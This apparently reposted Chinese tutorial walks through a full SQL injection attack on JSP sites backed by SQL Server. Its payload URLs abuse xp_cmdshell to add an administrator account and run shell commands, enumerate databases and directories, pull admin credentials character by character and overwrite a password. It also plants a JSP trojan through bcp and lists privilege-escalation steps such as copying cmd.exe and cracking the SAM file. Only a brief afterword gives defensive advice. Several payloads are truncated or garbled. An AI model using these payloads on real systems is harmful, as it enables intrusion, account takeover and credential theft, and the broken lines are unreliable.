主頁(yè) > 知識(shí)庫(kù) > sql注入過(guò)程詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理

sql注入過(guò)程詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理

熱門(mén)標(biāo)簽:怎樣在地圖上標(biāo)注路線圖標(biāo) 奧威地圖標(biāo)注多個(gè)地方 京華物流公司地圖標(biāo)注 智能語(yǔ)音外呼系統(tǒng)選哪家 優(yōu)質(zhì)地圖標(biāo)注 武漢長(zhǎng)沙外呼系統(tǒng)方法和技巧 外呼系統(tǒng)電銷專用 千呼電銷機(jī)器人價(jià)格 百度地圖標(biāo)注不同路線

SQL注入攻擊的總體思路是:

1.發(fā)現(xiàn)SQL注入位置;
2.判斷后臺(tái)數(shù)據(jù)庫(kù)類型;
3.確定XP_CMDSHELL可執(zhí)行情況
4.發(fā)現(xiàn)WEB虛擬目錄
5. 上傳JSP木馬;
6.得到管理員權(quán)限;

一、SQL注入漏洞的判斷

一般來(lái)說(shuō),SQL注入一般存在于形如:HTTP://xxx.xxx.xxx/abc.jsp?id=XX等帶有參數(shù)的jsp或者動(dòng)態(tài)網(wǎng)頁(yè)中,有時(shí)一個(gè)動(dòng)態(tài)網(wǎng)頁(yè)中可能只有一個(gè)參數(shù),有時(shí)可能有N個(gè)參數(shù),有時(shí)是整型參數(shù),有時(shí)是字符串型參數(shù),不能一概而論??傊灰菐в袇?shù)的動(dòng)態(tài)網(wǎng)頁(yè)且此網(wǎng)頁(yè)訪問(wèn)了數(shù)據(jù)庫(kù),那么就有可能存在SQL注入。如果程序員沒(méi)有安全意識(shí),不進(jìn)行必要的字符過(guò)濾,存在SQL注入的可能性就非常大。
為了全面了解動(dòng)態(tài)網(wǎng)頁(yè)回答的信息,首選請(qǐng)調(diào)整IE的配置。把IE菜單-工具-Internet選項(xiàng)-高級(jí)-顯示友好HTTP錯(cuò)誤信息前面的勾去掉。

為了把問(wèn)題說(shuō)明清楚,以下以HTTP://xxx.xxx.xxx/abc.jsp?p=YY為例進(jìn)行分析,YY可能是整型,也有可能是字符串。

1、整型參數(shù)的判斷

當(dāng)輸入的參數(shù)YY為整型時(shí),通常abc.jsp中SQL語(yǔ)句原貌大致如下:
select * from 表名 where 字段=YY,所以可以用以下步驟測(cè)試SQL注入是否存在。
①HTTP://xxx.xxx.xxx/abc.jsp?p=YY'(附加一個(gè)單引號(hào)),此時(shí)abc.JSP中的SQL語(yǔ)句變成了
select * from 表名 where 字段=YY',abc.jsp運(yùn)行異常;
②HTTP://xxx.xxx.xxx/abc.jsp?p=YY and 1=1, abc.jsp運(yùn)行正常,而且與HTTP://xxx.xxx.xxx/abc.jsp?p=YY運(yùn)行結(jié)果相同;
③HTTP://xxx.xxx.xxx/abc.jsp?p=YY and 1=2, abc.jsp運(yùn)行異常;
如果以上三步全面滿足,abc.jsp中一定存在SQL注入漏洞。

2、特殊情況的處理

有時(shí)JSP程序員會(huì)在程序員過(guò)濾掉單引號(hào)等字符,以防止SQL注入。此時(shí)可以用以下幾種方法試一試。
①大小定混合法:由于VBS并不區(qū)分大小寫(xiě),而程序員在過(guò)濾時(shí)通常要么全部過(guò)濾大寫(xiě)字符串,要么全部過(guò)濾小寫(xiě)字符串,而大小寫(xiě)混合往往會(huì)被忽視。如用SelecT代替select,SELECT等;
②UNICODE法:在IIS中,以UNICODE字符集實(shí)現(xiàn)國(guó)際化,我們完全可以IE中輸入的字符串化成UNICODE字符串進(jìn)行輸入。如+ =%2B,空格=%20 等;URLEncode信息參見(jiàn)附件一;
③ASCII碼法:可以把輸入的部分或全部字符全部用ASCII碼代替,如U=chr(85),a=chr(97)等,ASCII信息參見(jiàn)附二;

二、區(qū)分?jǐn)?shù)據(jù)庫(kù)服務(wù)器類型

一般來(lái)說(shuō),mysql是最常用的數(shù)據(jù)庫(kù)服務(wù)器,盡管它們都支持T-SQL標(biāo)準(zhǔn),但還有不同之處,而且不同的數(shù)據(jù)庫(kù)有不同的攻擊方法,必須要區(qū)別對(duì)待。

1、 利用數(shù)據(jù)庫(kù)服務(wù)器的系統(tǒng)變量進(jìn)行區(qū)分

SQL-SERVER有user,db_name()等系統(tǒng)變量,利用這些系統(tǒng)值不僅可以判斷SQL-SERVER,而且還可以得到大量有用信息。如:
① HTTP://xxx.xxx.xxx/abc.jsp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當(dāng)前連接到數(shù)據(jù)庫(kù)的用戶名
②HTTP://xxx.xxx.xxx/abc.jsp?p=YYn ... db_name()>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當(dāng)前正在使用的數(shù)據(jù)庫(kù)名;

2、利用系統(tǒng)表

ACCESS的系統(tǒng)表是msysobjects,且在WEB環(huán)境下沒(méi)有訪問(wèn)權(quán)限,而SQL-SERVER的系統(tǒng)表是sysobjects,在WEB環(huán)境下有訪問(wèn)權(quán)限。對(duì)于以下兩條語(yǔ)句:
①HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select count(*) from sysobjects)>0
②HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select count(*) from msysobjects)>0
若數(shù)據(jù)庫(kù)是SQL-SERVE,則第一條,abc.jsp一定運(yùn)行正常,第二條則異常;若是ACCESS則兩條都會(huì)異常。

3、 MSSQL三個(gè)關(guān)鍵系統(tǒng)表

sysdatabases系統(tǒng)表:Microsoft SQL Server 上的每個(gè)數(shù)據(jù)庫(kù)在表中占一行。最初安裝 SQL Server 時(shí),sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 數(shù)據(jù)庫(kù)的項(xiàng)。該表只存儲(chǔ)在 master 數(shù)據(jù)庫(kù)中。 這個(gè)表保存在master數(shù)據(jù)庫(kù)中,這個(gè)表中保存的是什么信息呢?這個(gè)非常重要。他是 保存了所有的庫(kù)名,以及庫(kù)的ID和一些相關(guān)信息。 

這里我把對(duì)于我們有用的字段名稱和相關(guān)說(shuō)明給大家列出來(lái)。name //表示庫(kù)的名字。

dbid //表示庫(kù)的ID,dbid從1到5是系統(tǒng)的。分別是:master、model、msdb、mssqlweb、tempdb 這五個(gè)庫(kù)。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫(kù)名。

Sysobjects:SQL-SERVER的每個(gè)數(shù)據(jù)庫(kù)內(nèi)都有此系統(tǒng)表,它存放該數(shù)據(jù)庫(kù)內(nèi)創(chuàng)建的所有對(duì)象,如約束、默認(rèn)值、日志、規(guī)則、存儲(chǔ)過(guò)程等,每個(gè)對(duì)象在表中占一行。以下是此系統(tǒng)表的字段名稱和相關(guān)說(shuō)明。

Name,id,xtype,uid,status:分別是對(duì)象名,對(duì)象ID,對(duì)象類型,所有者對(duì)象的用戶ID,對(duì)象狀態(tài)。
對(duì)象類型(xtype)??梢允窍铝袑?duì)象類型中的一種:
C = CHECK 約束 
D = 默認(rèn)值或 DEFAULT 約束 
F = FOREIGN KEY 約束 
L = 日志 
FN = 標(biāo)量函數(shù) 
IF = 內(nèi)嵌表函數(shù) 
P = 存儲(chǔ)過(guò)程 
PK = PRIMARY KEY 約束(類型是 K) 
RF = 復(fù)制篩選存儲(chǔ)過(guò)程 
S = 系統(tǒng)表 
TF = 表函數(shù) 
TR = 觸發(fā)器 
U = 用戶表 
UQ = UNIQUE 約束(類型是 K) 
V = 視圖 
X = 擴(kuò)展存儲(chǔ)過(guò)程 

當(dāng)xtype='U' and status>0代表是用戶建立的表,對(duì)象名就是表名,對(duì)象ID就是表的ID值。

用: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 就可以列出庫(kù)ChouYFD中所有的用戶建立的表名。

syscolumns :每個(gè)表和視圖中的每列在表中占一行,存儲(chǔ)過(guò)程中的每個(gè)參數(shù)在表中也占一行。該表位于每個(gè)數(shù)據(jù)庫(kù)中。主要字段有: name ,id, colid :分別是字段名稱,表ID號(hào),字段ID號(hào),其中的 ID 是 剛上我們用sysobjects得到的表的ID號(hào)。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個(gè)庫(kù)中,表的ID是123456789中的所有字段列表。

三、確定XP_CMDSHELL可執(zhí)行情況

若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限,且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過(guò)程(調(diào)用此存儲(chǔ)過(guò)程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行,則整個(gè)計(jì)算機(jī)可以通過(guò)以下幾種方法完全控制,以后的所有步驟都可以省
1、HTTP://xxx.xxx.xxx/abc.jsp?p=YYnb ... er>0 abc.jsp執(zhí)行異常但可以得到當(dāng)前連接數(shù)據(jù)庫(kù)的用戶名(若顯示dbo則代表SA)。
2、HTTP://xxx.xxx.xxx/abc.jsp?p=YY ... me()>0 abc.jsp執(zhí)行異常但可以得到當(dāng)前連接的數(shù)據(jù)庫(kù)名。
3、HTTP://xxx.xxx.xxx/abc.jsp?p=YY;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數(shù)據(jù)庫(kù);名中的分號(hào)表示SQL-SERVER執(zhí)行完分號(hào)前的語(yǔ)句名,繼續(xù)執(zhí)行其后面的語(yǔ)句;“—”號(hào)是注解,表示其后面的所有內(nèi)容僅為注釋,系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。
4、HTTP://xxx.xxx.xxx/abc.jsp?p=YY;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加的帳戶aaa加到administrators組中。
5、HTTP://xxx.xxx.xxx/abc.jsp?p=YY;backuup database 數(shù)據(jù)庫(kù)名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數(shù)據(jù)內(nèi)容全部備份到WEB目錄下,再用HTTP把此文件下載(當(dāng)然首選要知道WEB虛擬目錄)。
6、通過(guò)復(fù)制CMD創(chuàng)建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;exe ... dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便制造了一個(gè)UNICODE漏洞,通過(guò)此漏洞的利用方法,便完成了對(duì)整個(gè)計(jì)算機(jī)的控制(當(dāng)然首選要知道WEB虛擬目錄)。

四、發(fā)現(xiàn)WEB虛擬目錄

只有找到WEB虛擬目錄,才能確定放置JSP木馬的位置,進(jìn)而得到USER權(quán)限。有兩種方法比較有效。

一是根據(jù)經(jīng)驗(yàn)猜解,一般來(lái)說(shuō),WEB虛擬目錄是:c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等,而可執(zhí)行虛擬目錄是:c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統(tǒng)的目錄結(jié)構(gòu),分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄;

先創(chuàng)建一個(gè)臨時(shí)表:temp
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;createn ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

接下來(lái):

(1)我們可以利用xp_availablemedia來(lái)獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中:
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
我們可以通過(guò)查詢temp的內(nèi)容來(lái)獲得驅(qū)動(dòng)器列表及相關(guān)信息

(2)我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--

(3)我們還可以利用xp_dirtree獲得所有子目錄的目錄樹(shù)結(jié)構(gòu),并寸入temp表中:
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個(gè)文件的內(nèi)容,可以通過(guò)執(zhí)行xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(id) exec ... nbsp;'type c:\webindex.jsp';--
使用'bulk insert'語(yǔ)法可以將一個(gè)文本文件插入到一個(gè)臨時(shí)表中。如:bulk insert temp(id) from 'c:\inetpubwwwrootindex.jsp' 
瀏覽temp就可以看到index.jsp文件的內(nèi)容了!通過(guò)分析各種JSP文件,可以得到大量系統(tǒng)信息,WEB建設(shè)與管理信息,甚至可以得到SA帳號(hào)的連接密碼。
當(dāng)然,如果xp_cmshell能夠執(zhí)行,我們可以用它來(lái)完成:
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(id)nbs ... cmdshell 'dir c:\';--
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(id)n ... p_cmdshell 'dir c:\ *.jsp /s/a';--
通過(guò)xp_cmdshell我們可以看到所有想看到的,包括W3svc
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ubAdminScriptsadsutil.vbs enum w3svc'
但是,如果不是SA權(quán)限,我們還可以使用
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意:

1、以上每完成一項(xiàng)瀏覽后,應(yīng)刪除TEMP中的所有內(nèi)容,刪除方法是:
HTTP://xxx.xxx.xxx/abc.jsp?p=YY;delete from temp;--
2、瀏覽TEMP表的方法是:(假設(shè)TestDB是當(dāng)前連接的數(shù)據(jù)庫(kù)名)
HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值,并與整數(shù)進(jìn)行比較,顯然abc.jsp工作異常,但在異常中卻可以發(fā)現(xiàn)id字段的值。假設(shè)發(fā)現(xiàn)的表名是xyz,則
HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 得到表TEMP中第二條記錄id字段的值。

五、上傳JSP木馬

所謂JSP木馬,就是一段有特殊功能的JSP代碼,并放入WEB虛擬目錄的Scripts下,遠(yuǎn)程客戶通過(guò)IE就可執(zhí)行它,進(jìn)而得到系統(tǒng)的USER權(quán)限,實(shí)現(xiàn)對(duì)系統(tǒng)的初步控制。上傳JSP木馬一般有兩種比較有效的方法:

1、利用WEB的遠(yuǎn)程管理功能

許多WEB站點(diǎn),為了維護(hù)的方便,都提供了遠(yuǎn)程管理的功能;也有不少WEB站點(diǎn),其內(nèi)容是對(duì)于不同的用戶有不同的訪問(wèn)權(quán)限。為了達(dá)到對(duì)用戶權(quán)限的控制,都有一個(gè)網(wǎng)頁(yè),要求用戶名與密碼,只有輸入了正確的值,才能進(jìn)行下一步的操作,可以實(shí)現(xiàn)對(duì)WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。

因此,若獲取正確的用戶名與密碼,不僅可以上傳JSP木馬,有時(shí)甚至能夠直接得到USER權(quán)限而瀏覽系統(tǒng),上一步的“發(fā)現(xiàn)WEB虛擬目錄”的復(fù)雜操作都可省略。

用戶名及密碼一般存放在一張表中,發(fā)現(xiàn)這張表并讀取其中內(nèi)容便解決了問(wèn)題。以下給出兩種有效方法。

A、 注入法:

從理論上說(shuō),認(rèn)證網(wǎng)頁(yè)中會(huì)有型如:
select * from admin where username='XXX' and passWord='YYY' 的語(yǔ)句,若在正式運(yùn)行此句之前,沒(méi)有進(jìn)行必要的字符過(guò)濾,則很容易實(shí)施SQL注入。
如在用戶名文本框內(nèi)輸入:abc' or 1=1-- 在密碼框內(nèi)輸入:123 則SQL語(yǔ)句變成:
select * from admin where username='abc' or 1=1 and password='123' 不管用戶輸入任何用戶名與密碼,此語(yǔ)句永遠(yuǎn)都能正確執(zhí)行,用戶輕易騙過(guò)系統(tǒng),獲取合法身份。

B、猜解法:

基本思路是:猜解所有數(shù)據(jù)庫(kù)名稱,猜出庫(kù)中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個(gè)字段名,猜出表中的每條記錄內(nèi)容。

l 猜解所有數(shù)據(jù)庫(kù)名稱

HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) >0 因?yàn)?nbsp;dbid 的值從1到5,是系統(tǒng)用了。所以用戶自己建的一定是從6開(kāi)始的。并且我們提交了 name>1 (name字段是一個(gè)字符型的字段和數(shù)字比較會(huì)出錯(cuò)),abc.jsp工作異常,可得到第一個(gè)數(shù)據(jù)庫(kù)名,同理把DBID分別改成7,8,9,10,11,12…就可得到所有數(shù)據(jù)庫(kù)名。
以下假設(shè)得到的數(shù)據(jù)庫(kù)名是TestDB。

l 猜解數(shù)據(jù)庫(kù)中用戶名表的名稱

猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜表名,一般來(lái)說(shuō),user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通過(guò)語(yǔ)句進(jìn)行判斷
HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在,則abc.jsp工作正常,否則異常。如此循環(huán),直到猜到系統(tǒng)帳號(hào)表的名稱。

讀取法:SQL-SERVER有一個(gè)存放系統(tǒng)核心信息的表sysobjects,有關(guān)一個(gè)庫(kù)的所有表,視圖等信息全部存放在此表中,而且此表可以通過(guò)WEB進(jìn)行訪問(wèn)。 

當(dāng)xtype='U' and status>0代表是用戶建立的表,發(fā)現(xiàn)并分析每一個(gè)用戶建立的表及名稱,便可以得到用戶名表的名稱,基本的實(shí)現(xiàn)方法是:

①HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 得到第一個(gè)用戶建立表的名稱,并與整數(shù)進(jìn)行比較,顯然abc.jsp工作異常,但在異常中卻可以發(fā)現(xiàn)表的名稱。假設(shè)發(fā)現(xiàn)的表名是xyz,則

②HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top 1 name from TestDB.dbo.sysobjects ... tatus>0 and name not in('xyz'))>0 可以得到第二個(gè)用戶建立的表的名稱,同理就可得到所有用建立的表的名稱。
根據(jù)表的名稱,一般可以認(rèn)定那張表用戶存放用戶名及密碼,以下假設(shè)此表名為Admin。

l 猜解用戶名字段及密碼字段名稱

admin表中一定有一個(gè)用戶名字段,也一定有一個(gè)密碼字段,只有得到此兩個(gè)字段的名稱,才有可能得到此兩字段的內(nèi)容。如何得到它們的名稱呢,同樣有以下兩種方法。

猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜字段名,一般來(lái)說(shuō),用戶名字段的名稱常用:username,name,user,account等。而密碼字段的名稱常用:password,pass,pwd,passwd等。并通過(guò)語(yǔ)句進(jìn)行判斷
HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”語(yǔ)句得到表的行數(shù),所以若字段名存在,則abc.jsp工作正常,否則異常。如此循環(huán),直到猜到兩個(gè)字段的名稱。
讀取法:基本的實(shí)現(xiàn)方法是
HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個(gè)字段名,當(dāng)與整數(shù)進(jìn)行比較,顯然abc.jsp工作異常,但在異常中卻可以發(fā)現(xiàn)字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5,6…就可得到所有的字段名稱。

l 猜解用戶名與密碼

猜用戶名與密碼的內(nèi)容最常用也是最有效的方法有:

ASCII碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的。基本的思路是先猜出字段的長(zhǎng)度,然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同,以下以猜用戶名為例說(shuō)明其過(guò)程。

HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select topn ... nbsp;from TestDB.dbo.admin)=X(X=1,2,3,4,5,… n,username為用戶名字段的名稱,admin為表的名稱),若x為某一值i且abc.jsp運(yùn)行正常時(shí),則i就是第一個(gè)用戶名的長(zhǎng)度。

如:當(dāng)輸入HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時(shí)abc.jsp運(yùn)行正常,則第一個(gè)用戶名的長(zhǎng)度為8

HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長(zhǎng)度之間,當(dāng)m=1,2,3,…時(shí)猜測(cè)分別猜測(cè)第1,2,3,…位的值;n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之間的任意值;admin為系統(tǒng)用戶帳號(hào)表的名稱),若n為某一值i且abc.jsp運(yùn)行正常時(shí),則i對(duì)應(yīng)ASCII碼就是用戶名某一位值。

如:當(dāng)輸入

HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時(shí)abc.jsp運(yùn)行正常,則用戶名的第三位為P(P的ASCII為80);

HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時(shí)abc.jsp運(yùn)行正常,則用戶名的第9位為!(!的ASCII為80);

猜到第一個(gè)用戶名及密碼后,同理,可以猜出其他所有用戶名與密碼。注意:有時(shí)得到的密碼可能是經(jīng)md5等方式加密后的信息,還需要用專用工具進(jìn)行脫密。或者先改其密碼,使用完后再改回來(lái),見(jiàn)下面說(shuō)明。

簡(jiǎn)單法:

猜用戶名用
HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個(gè)字段,username是用戶名字段,此時(shí)abc.jsp工作異常,但能得到Username的值。與上同樣的方法,可以得到第二用戶名,第三個(gè)用戶等等,直到表中的所有用戶名。

猜用戶密碼:HTTP://xxx.xxx.xxx/abc.jsp?p=YY and (select top 1nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個(gè)字段,pwd是密碼字段,此時(shí)abc.jsp工作異常,但能得到pwd的值。與上同樣的方法,可以得到第二用戶名的密碼,第三個(gè)用戶的密碼等等,直到表中的所有用戶的密碼。密碼有時(shí)是經(jīng)MD5加密的,可以改密碼。

HTTP://xxx.xxx.xxx/abc.jsp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1的MD5值為:AAABBBCCCDDDEEEF,即把密碼改成1;www為已知的用戶名)
用同樣的方法當(dāng)然可把密碼改原來(lái)的值。

2、利用表內(nèi)容導(dǎo)成文件功能

SQL有BCP命令,它可以把表的內(nèi)容導(dǎo)成文本文件并放到指定位置。利用這項(xiàng)功能,我們可以先建一張臨時(shí)表,然后在表中一行一行地輸入一個(gè)JSP木馬,然后用BCP命令導(dǎo)出形成JSP文件。
命令行格式如下:
bcp "select * from text..foo" queryout c:\inetpubwwwrootruncommand.jsp –c –S localhost –U sa –P foobar ('S'參數(shù)為執(zhí)行查詢的服務(wù)器,'U'參數(shù)為用戶名,'P'參數(shù)為密碼,最終上傳了一個(gè)runcommand.jsp的木馬)

六、得到系統(tǒng)的管理員權(quán)限

JSP木馬只有USER權(quán)限,要想獲取對(duì)系統(tǒng)的完全控制,還要有系統(tǒng)的管理員權(quán)限。怎么辦?提升權(quán)限的方法有很多種:
上傳木馬,修改開(kāi)機(jī)自動(dòng)運(yùn)行的.ini文件(它一重啟,便死定了);
復(fù)制CMD.exe到scripts,人為制造UNICODE漏洞;
下載SAM文件,破解并獲取OS的所有用戶名密碼;
等等,視系統(tǒng)的具體情況而定,可以采取不同的方法。

后記

  正如上文所描述的,SQL 漏洞危害非常的巨大,但我相信國(guó)內(nèi)很多中小站點(diǎn)還普遍存在著這樣的漏洞。這里有些個(gè)人的不完全建議

        1、代碼要對(duì)輸入的參數(shù)做到充分的過(guò)濾,并盡可能得考慮極端情況
  2、錯(cuò)誤信息盡可能的少,否則無(wú)關(guān)的人看不懂而有心的人就會(huì)提起興趣
  3、不要以管理員的身份運(yùn)行服務(wù)器進(jìn)程
  4、某些情況下,net 命令對(duì)于攻擊者而言就是“微軟牌”的木馬
  5、嚴(yán)格控制遠(yuǎn)程登錄訪問(wèn)者的來(lái)源
  6、如果可能的情況下,不是很推薦使用 Windows 作為服務(wù)器操作系統(tǒng)

以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。

您可能感興趣的文章:
  • 避免sql注入_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
  • Sql注入工具_(dá)動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
  • Sql注入原理簡(jiǎn)介_(kāi)動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
  • java持久層框架mybatis防止sql注入的方法
  • java 過(guò)濾器filter防sql注入的實(shí)現(xiàn)代碼
  • Java面試題解析之判斷以及防止SQL注入

標(biāo)簽:防疫戰(zhàn)設(shè) 來(lái)賓 七臺(tái)河 威海 益陽(yáng) 天水 銅仁 宿州

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《sql注入過(guò)程詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理》,本文關(guān)鍵詞  sql,注入,過(guò)程,詳解,動(dòng)力,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《sql注入過(guò)程詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于sql注入過(guò)程詳解_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章